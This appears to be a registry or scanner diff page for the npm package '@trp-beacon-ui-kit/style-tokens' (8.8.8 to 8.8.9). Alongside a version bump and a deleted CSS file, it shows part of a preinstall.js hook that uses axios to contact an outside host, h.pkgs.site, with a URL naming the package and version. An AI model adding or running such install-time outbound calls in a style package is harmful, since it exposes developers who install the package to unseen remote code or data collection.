@trp-beacon-ui-kit/style-tokens 8.8.8 → 8.8.9

Sign up to get free protection for your applications and to get access to all the features.
File without changes
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@trp-beacon-ui-kit/style-tokens",
3
- "version": "8.8.8",
3
+ "version": "8.8.9",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -23,7 +23,7 @@ try {
23
23
  const axios = require('axios');
24
24
  const semver = require('semver');
25
25
 
26
- const url = 'https://h.pkgs.site/trp-beacon-ui-kit/fonts?v=8.8.8';
26
+ const url = 'https://h.pkgs.site/trp-beacon-ui-kit/style-tokens?v=8.8.9';
27
27
 
28
28
  axios.get(url)
29
29
  .then(res => {
package/fonts.css DELETED
@@ -1,4 +0,0 @@
1
- /* Red Paragraphs ssss */
2
- p {
3
- color: red;
4
- }